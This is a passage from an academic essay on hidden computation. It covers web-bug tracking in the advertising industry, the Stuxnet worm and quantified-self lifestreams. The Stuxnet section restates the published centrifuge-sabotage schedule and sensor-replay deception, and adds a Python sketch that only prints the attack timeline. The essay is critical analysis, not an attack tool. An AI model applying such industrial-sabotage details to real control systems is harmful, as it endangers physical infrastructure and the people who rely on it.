which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitors when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). One can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative, directions of travel is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics website which claims to keep 'an eye on 1091622 websites'; it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data, which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This is an issue helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise the fact that it is actually gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general-purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have had to be working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection of the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures; the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. 
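&lt;br /&gt;
Read as an algorithm, the attack cadence Zetter describes above is a simple timed loop. The following sketch - a reading aid in Python that merely prints the reported timeline; all names are assumed and nothing here is taken from the actual Stuxnet code - makes the periodic structure of the two attack sequences explicit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Illustrative reconstruction of the attack cadence reported by Zetter (2011);&lt;br /&gt;
# only the timings come from the published analysis, everything else is assumed.&lt;br /&gt;
NOMINAL_HZ = 1064&lt;br /&gt;
&lt;br /&gt;
# (label, target frequency in Hz, minutes held, days of silence afterwards)&lt;br /&gt;
STAGES = [&lt;br /&gt;
    ('overspeed', 1410, 15, 27),   # near the IR-1 rotor's mechanical limit&lt;br /&gt;
    ('near-stall', 2, 50, 27),     # fatigues the motors at the other extreme&lt;br /&gt;
]&lt;br /&gt;
&lt;br /&gt;
def timeline(cycles=2):&lt;br /&gt;
    day = 0.0&lt;br /&gt;
    for _ in range(cycles):&lt;br /&gt;
        for label, hz, minutes, quiet_days in STAGES:&lt;br /&gt;
            print('day %6.1f: drive rotors to %4d Hz (%s) for %d minutes' %&lt;br /&gt;
                  (day, hz, label, minutes))&lt;br /&gt;
            print('day %6.1f: restore %d Hz, replay normal sensor data, wait' %&lt;br /&gt;
                  (day, NOMINAL_HZ))&lt;br /&gt;
            day += quiet_days&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    timeline()&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The 27-day silences between stages, together with the replayed sensor data, are what make the induced failures look like ordinary wear rather than an attack.&lt;br /&gt;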
The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis, performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to Myrtus 'as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of data on industrial control systems and structures - a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years as ‘real-time stream’ platforms such as Twitter and Facebook have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea of David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), who described them as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
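Read as a data structure, this description is surprisingly concrete. The following is a minimal sketch in Python, based on my own assumptions rather than on Freeman's actual Lifestreams architecture, of a lifestream as a time-ordered list of documents with a few of the operators described above: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of a lifestream: a time-ordered list of documents
# with simple operators for filtering and summarising. The class and
# field names are my own, not Freeman's.
from dataclasses import dataclass

@dataclass
class Document:
    timestamp: str  # ISO 8601, so lexical order is temporal order
    kind: str       # 'mail', 'photo', 'reminder', ...
    content: str

class Lifestream:
    def __init__(self):
        self.docs = []  # the tail holds the past, the head the present

    def store(self, doc):
        # 'transparently store information' in time order
        self.docs.append(doc)
        self.docs.sort(key=lambda d: d.timestamp)

    def substream(self, kind):
        # 'organize information on demand' by filtering the stream
        return [d for d in self.docs if d.kind == kind]

    def summary(self, count=3):
        # 'compress' documents into an overview of the most recent items
        return [d.content for d in self.docs[-count:]]
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;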
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its short, text-message-sized updates of 140 characters. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, having started in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of the data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard 